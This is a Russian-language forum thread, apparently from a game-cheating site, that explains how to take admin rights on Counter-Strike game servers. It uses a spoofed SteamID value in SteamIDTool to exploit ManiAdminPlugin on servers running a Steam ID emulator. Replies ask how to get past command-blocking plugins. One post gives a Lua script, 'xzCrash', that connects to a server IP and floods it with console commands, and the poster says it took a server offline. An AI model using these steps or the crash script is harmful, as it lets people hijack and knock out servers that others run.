Сейчас поподробней попытаюсь объяснить саму задачу.
Допустим. Админ установил какой то плагин. Он пользуется SourceMod` ом и по SourceMod прописывает админки. А ManiAdminPlugin установлен и ничего не изменялось, т.е. просто установленная.
У админа в текстовых блокнотах ManiAdminPlugin прописывается определенный Steam. С помощью вот этого числа 1232142949, мы получим этот Steam, который записан в клиенте у админа, тем самым пропишем себе админку.
Нам понадобится программа SteamIDTool. Cкачать архив [Ссылки могут видеть только зарегистрированные пользователи. ]
ВТ на саму программу [Ссылки могут видеть только зарегистрированные пользователи. ]
Открываем программу
Ниже вписываем Mani_bug
Цитата:
Mani_bug : 1232142949
Нажимаем apply и заходим на сервер. Проверяем ManiAdminPlugin Bug, прописываем admin в консоле. Админка появилась, админка взломалась !
P.S. работает не на всех серверах.
P.S.S. SteamIDTool работает только на операционных системах Win7/8.
P.S.S.S. для того что бы Steam поменялся, на сервере который мы хотим взломать, должен быть установлен Steam ID Emulator по железу, а не по IP.
P.S.S.S.S что бы взломать другие админки, используйте другие баги(SM/EST) и SteamIDTool. Ломаются так же !
Последний раз редактировалось InfectedXMP; 31.07.2014 в 13:21.
Добавллю, мб кому пригодится:
Для проделки такой фичи надо чтобы стоял на сервере эмулятор стима, если стим будет с шестерками, то ничего не получится.
слушай помоги а. админ на серваке использует плагин Command Blocker и Mzx's Anti-Exploits который запрешает в сонфиге сервер кфг запускать команды такие как ркон админ см админ ест админ ес тулс и sv.... как быть? на 100% уверен что админки не менялись когда админ их скачивал. т.к. сервер легок и его можно взломать. но из-за конфига сервера не получается(
Добавлено через 8 часов 19 минут
Цитата:
Сообщение от CaRLiTo_O
Как определить что на серваке установлен Steam ID Emulator ?
aвтоматически генерирует всем игрокам сервера свой Steam ID! с помощью него по стиму прописывают админки и т д
пишешь status и там показываются все смиды всех игроков. правда можно установить стимхайдер, и стим показываться не будет
если есть ркон то пиши ркон статус там есть доп инфа вроть
Последний раз редактировалось GoshaRodionov; 01.11.2013 в 13:28.
Причина: Добавлено сообщение
я думал что все так тяжело) оказывается легко, взять число и вставить в прогу)
только у меня после того как я в стим ид тулсе променил этот так называемый баг у меня в игре стим стал 0:1:1 но админка появилась. это норма. так должно быть?
хотелось бы донести что с этими багами есть еще уязвимости.
ломанув сегодня команды админки ЕСТ я прописал вот такой скрипт:
Код:
if args ~= "" then
ip = args
print("Crash server : "..ip.."")
cmd("connect "..ip.."")
wait(200)
x = 0
s = 5
while x<15 do
if x==15 then
wait(500)
rawcmd('\99\108\101\97\114\n')
rawcmd('\114\101\116\114\121\n')
end
cmd(string.rep("cmd dump_entity_sizes;",s))
wait(10)
cmd(string.rep("cmd groundlist;",s))
wait(10)
cmd(string.rep("cmd heartbeat;",s))
wait(10)
cmd(string.rep("cmd npc_speakall;",s))
wait(10)
cmd(string.rep("cmd npc_heal;",s))
wait(10)
cmd(string.rep("cmd npc_ammo_deplete;",s))
wait(10)
cmd(string.rep("cmd npc_heal;",s))
wait(10)
cmd(string.rep("cmd npc_thinknow;",s))
wait(10)
cmd(string.rep("cmd physics_debug_entity;",s))
wait(10)
cmd(string.rep("cmd physics_select;",s))
wait(10)
cmd(string.rep("cmd wc_update_entity;",s))
wait(10)
cmd(string.rep("cmd npc_speakall",s))
wait(10)
cmd(string.rep("cmd npc_speakall",s))
wait(10)
cmd(string.rep("cmd timeleft;",s))
wait(15)
x = x + 1
end
else
rawcmd('\99\108\101\97\114\n')
wait(100)
print('ERROR')
wait(10)
print('Example : openscript xzCrash.lua "ip server"')
print('xzCrash by -DeZerT-)
end
не знаю что именно . но кое какие команды из этого скрипта не вводятся из отсутствия доступа к админке, кода я получил доступ к админке и ест гуд с ест тулс багам я отключил сервер вот этим скриптом.